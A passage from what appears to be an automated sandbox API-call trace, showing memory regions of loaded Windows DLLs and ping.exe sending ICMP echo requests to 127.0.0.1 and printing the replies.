"c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4312 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4313 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4314 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4315 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4316 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4317 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4318 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4319 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4320 start_va = 0x7e3d0000 end_va = 0x7e4cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e3d0000" filename = "" Region: id = 4321 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 4322 start_va = 0xbe0000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 4323 start_va = 0x7e4f8000 end_va = 0x7e4fafff entry_point = 0x0 region_type = private name = "private_0x000000007e4f8000" filename = "" Region: id = 4324 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 4325 start_va = 0x910000 end_va = 0x912fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 4326 start_va = 0x9f0000 end_va = 0x9f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 4327 start_va = 0xa00000 end_va = 0xa02fff entry_point = 0xa00000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 4328 start_va = 0xc20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 4329 start_va = 0xc60000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 4330 start_va = 0x7e3cd000 end_va = 0x7e3cffff entry_point = 0x0 region_type = private name = "private_0x000000007e3cd000" filename = "" Thread: id = 241 os_tid = 0xbcc [0091.596] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0091.596] __set_app_type (_Type=0x1) [0091.596] __p__fmode () returned 0x76ea1768 [0091.596] __p__commode () returned 0x76ea176c [0091.596] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0091.596] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0091.596] SetThreadUILanguage (LangId=0x0) returned 0x409 [0091.598] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.598] _fileno (_File=0x76ea4c28) returned 1 [0091.598] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.598] GetFileType (hFile=0x28) returned 0x2 [0091.598] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf118 | out: lpMode=0x9cf118) returned 0 [0091.598] GetLastError () returned 0x6 [0091.598] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf07c, nSize=0x50 | out: lpBuffer="䤐¡") returned 0x0 [0091.598] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0091.600] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x9cf134 | out: phkResult=0x9cf134*=0x88) returned 0x0 [0091.600] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x9cf128, lpData=0x9cf130, lpcbData=0x9cf12c*=0x4 | out: lpType=0x9cf128*=0x0, lpData=0x9cf130*=0x0, lpcbData=0x9cf12c*=0x4) returned 0x2 [0091.600] RegCloseKey (hKey=0x88) returned 0x0 [0091.600] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x9cf0f8*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9cf134 | out: ppResult=0x9cf134*=0xa1c340*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa18958*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0091.601] FreeAddrInfoW (pAddrInfo=0xa1c340*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa18958*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0091.601] IcmpCreateFile () returned 0xa16a68 [0091.603] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xa1c368 [0091.603] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xa25270 [0091.603] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x9cf230, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0091.604] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="竈¢﫸\x9c┗\x94䰨盪❋") returned 0x14 [0091.605] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.605] _fileno (_File=0x76ea4c28) returned 1 [0091.605] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.605] GetFileType (hFile=0x28) returned 0x2 [0091.605] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0091.605] GetLastError () returned 0x6 [0091.605] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c❋") returned 0x0 [0091.605] _fileno (_File=0x76ea4c28) returned 1 [0091.605] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0091.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.605] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xa27b00 [0091.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xa27b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0091.605] _fileno (_File=0x76ea4c28) returned 1 [0091.605] _write (in: _FileHandle=1, _Buf=0xa27b00*, _MaxCharCount=0x14 | out: _Buf=0xa27b00*) returned 20 [0091.605] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.605] _fileno (_File=0x76ea4c28) returned 1 [0091.605] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0091.605] LocalFree (hMem=0xa27b00) returned 0x0 [0091.605] LocalFree (hMem=0xa27ac8) returned 0x0 [0091.605] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="竈¢﫸\x9c▪\x94䰨盪❚") returned 0x18 [0091.605] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.606] _fileno (_File=0x76ea4c28) returned 1 [0091.606] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.606] GetFileType (hFile=0x28) returned 0x2 [0091.606] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0091.606] GetLastError () returned 0x6 [0091.606] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c❚") returned 0x0 [0091.606] _fileno (_File=0x76ea4c28) returned 1 [0091.606] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0091.606] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0091.606] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xa1c430 [0091.606] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xa1c430, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0091.606] _fileno (_File=0x76ea4c28) returned 1 [0091.606] _write (in: _FileHandle=1, _Buf=0xa1c430*, _MaxCharCount=0x18 | out: _Buf=0xa1c430*) returned 24 [0091.606] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.606] _fileno (_File=0x76ea4c28) returned 1 [0091.606] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0091.606] LocalFree (hMem=0xa1c430) returned 0x0 [0091.606] LocalFree (hMem=0xa27ac8) returned 0x0 [0091.606] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0091.606] IcmpSendEcho2Ex (in: IcmpHandle=0xa16a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa1c368, RequestSize=0x20, RequestOptions=0x9cf1a4, ReplyBuffer=0xa25270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa25270) returned 0x1 [0091.607] InetNtopW (in: Family=2, pAddr=0x9cf194, pStringBuf=0x9cf2bc, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0091.607] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="笈¢﫸\x9c⛔\x94䰨盪✣") returned 0x16 [0091.607] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.607] _fileno (_File=0x76ea4c28) returned 1 [0091.607] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.607] GetFileType (hFile=0x28) returned 0x2 [0091.607] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0091.607] GetLastError () returned 0x6 [0091.607] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c✣") returned 0x0 [0091.607] _fileno (_File=0x76ea4c28) returned 1 [0091.607] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.607] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0091.607] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa27b40 [0091.607] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa27b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0091.607] _fileno (_File=0x76ea4c28) returned 1 [0091.607] _write (in: _FileHandle=1, _Buf=0xa27b40*, _MaxCharCount=0x16 | out: _Buf=0xa27b40*) returned 22 [0091.607] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.607] _fileno (_File=0x76ea4c28) returned 1 [0091.607] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.607] LocalFree (hMem=0xa27b40) returned 0x0 [0091.607] LocalFree (hMem=0xa27b08) returned 0x0 [0091.607] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="笈¢﫸\x9c⛿\x94䰨盪✼") returned 0x9 [0091.607] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.607] _fileno (_File=0x76ea4c28) returned 1 [0091.607] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.607] GetFileType (hFile=0x28) returned 0x2 [0091.607] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0091.607] GetLastError () returned 0x6 [0091.607] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c✼") returned 0x0 [0091.607] _fileno (_File=0x76ea4c28) returned 1 [0091.607] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.607] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.607] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa18ac0 [0091.607] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa18ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0091.607] _fileno (_File=0x76ea4c28) returned 1 [0091.607] _write (in: _FileHandle=1, _Buf=0xa18ac0*, _MaxCharCount=0x9 | out: _Buf=0xa18ac0*) returned 9 [0091.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.608] _fileno (_File=0x76ea4c28) returned 1 [0091.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.608] LocalFree (hMem=0xa18ac0) returned 0x0 [0091.608] LocalFree (hMem=0xa27b08) returned 0x0 [0091.608] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x9cf12c, nSize=0x0, Arguments=0x9cf128 | out: lpBuffer="笈¢﫸\x9c➷\x94䰨盪✧") returned 0x9 [0091.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.608] _fileno (_File=0x76ea4c28) returned 1 [0091.608] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.608] GetFileType (hFile=0x28) returned 0x2 [0091.608] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0f0 | out: lpMode=0x9cf0f0) returned 0 [0091.608] GetLastError () returned 0x6 [0091.608] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf054, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0091.608] _fileno (_File=0x76ea4c28) returned 1 [0091.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.608] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa18988 [0091.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa18988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0091.608] _fileno (_File=0x76ea4c28) returned 1 [0091.608] _write (in: _FileHandle=1, _Buf=0xa18988*, _MaxCharCount=0x9 | out: _Buf=0xa18988*) returned 9 [0091.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.608] _fileno (_File=0x76ea4c28) returned 1 [0091.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.608] LocalFree (hMem=0xa18988) returned 0x0 [0091.608] LocalFree (hMem=0xa27b08) returned 0x0 [0091.608] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="笈¢﫸\x9c⟘\x94䰨盪✨") returned 0x9 [0091.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.608] _fileno (_File=0x76ea4c28) returned 1 [0091.608] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.608] GetFileType (hFile=0x28) returned 0x2 [0091.608] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0091.608] GetLastError () returned 0x6 [0091.608] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c✨") returned 0x0 [0091.608] _fileno (_File=0x76ea4c28) returned 1 [0091.608] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0091.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.608] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa18970 [0091.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa18970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0091.608] _fileno (_File=0x76ea4c28) returned 1 [0091.608] _write (in: _FileHandle=1, _Buf=0xa18970*, _MaxCharCount=0x9 | out: _Buf=0xa18970*) returned 9 [0091.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.608] _fileno (_File=0x76ea4c28) returned 1 [0091.608] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0091.608] LocalFree (hMem=0xa18970) returned 0x0 [0091.608] LocalFree (hMem=0xa27b08) returned 0x0 [0091.608] Sleep (dwMilliseconds=0x3e8) [0092.621] IcmpSendEcho2Ex (in: IcmpHandle=0xa16a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa1c368, RequestSize=0x20, RequestOptions=0x9cf1a4, ReplyBuffer=0xa25270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa25270) returned 0x1 [0092.621] InetNtopW (in: Family=2, pAddr=0x9cf194, pStringBuf=0x9cf2bc, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0092.621] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="羠¢﫸\x9c⛔\x94䰨盪✣") returned 0x16 [0092.621] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0092.621] _fileno (_File=0x76ea4c28) returned 1 [0092.621] _get_osfhandle (_FileHandle=1) returned 0x28 [0092.621] GetFileType (hFile=0x28) returned 0x2 [0092.621] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0092.621] GetLastError () returned 0x6 [0092.621] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c✣") returned 0x0 [0092.621] _fileno (_File=0x76ea4c28) returned 1 [0092.621] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0092.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0092.622] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa27fd8 [0092.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa27fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0092.622] _fileno (_File=0x76ea4c28) returned 1 [0092.622] _write (in: _FileHandle=1, _Buf=0xa27fd8*, _MaxCharCount=0x16 | out: _Buf=0xa27fd8*) returned 22 [0092.622] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0092.622] _fileno (_File=0x76ea4c28) returned 1 [0092.622] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0092.622] LocalFree (hMem=0xa27fd8) returned 0x0 [0092.622] LocalFree (hMem=0xa27fa0) returned 0x0 [0092.622] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="羠¢﫸\x9c⛿\x94䰨盪✼") returned 0x9 [0092.622] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0092.622] _fileno (_File=0x76ea4c28) returned 1 [0092.622] _get_osfhandle (_FileHandle=1) returned 0x28 [0092.622] GetFileType (hFile=0x28) returned 0x2 [0092.622] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0092.622] GetLastError () returned 0x6 [0092.622] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c✼") returned 0x0 [0092.622] _fileno (_File=0x76ea4c28) returned 1 [0092.622] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0092.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.622] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa18988 [0092.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa18988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0092.622] _fileno (_File=0x76ea4c28) returned 1 [0092.622] _write (in: _FileHandle=1, _Buf=0xa18988*, _MaxCharCount=0x9 | out: _Buf=0xa18988*) returned 9 [0092.622] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0092.622] _fileno (_File=0x76ea4c28) returned 1 [0092.622] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0092.622] LocalFree (hMem=0xa18988) returned 0x0 [0092.622] LocalFree (hMem=0xa27fa0) returned 0x0 [0092.622] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x9cf12c, nSize=0x0, Arguments=0x9cf128 | out: lpBuffer="羠¢﫸\x9c➷\x94䰨盪✧") returned 0x9 [0092.622] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0092.622] _fileno (_File=0x76ea4c28) returned 1 [0092.622] _get_osfhandle (_FileHandle=1) returned 0x28 [0092.622] GetFileType (hFile=0x28) returned 0x2 [0092.622] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0f0 | out: lpMode=0x9cf0f0) returned 0 [0092.622] GetLastError () returned 0x6 [0092.622] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf054, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0092.622] _fileno (_File=0x76ea4c28) returned 1 [0092.622] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0092.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.622] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa18928 [0092.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa18928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0092.622] _fileno (_File=0x76ea4c28) returned 1 [0092.623] _write (in: _FileHandle=1, _Buf=0xa18928*, _MaxCharCount=0x9 | out: _Buf=0xa18928*) returned 9 [0092.623] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0092.623] _fileno (_File=0x76ea4c28) returned 1 [0092.623] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0092.623] LocalFree (hMem=0xa18928) returned 0x0 [0092.623] LocalFree (hMem=0xa27fa0) returned 0x0 [0092.623] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="羠¢﫸\x9c⟘\x94䰨盪✨") returned 0x9 [0092.623] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0092.623] _fileno (_File=0x76ea4c28) returned 1 [0092.623] _get_osfhandle (_FileHandle=1) returned 0x28 [0092.623] GetFileType (hFile=0x28) returned 0x2 [0092.623] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0092.623] GetLastError () returned 0x6 [0092.623] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c✨") returned 0x0 [0092.623] _fileno (_File=0x76ea4c28) returned 1 [0092.623] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0092.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.623] LocalAlloc (uFlags=0x40, 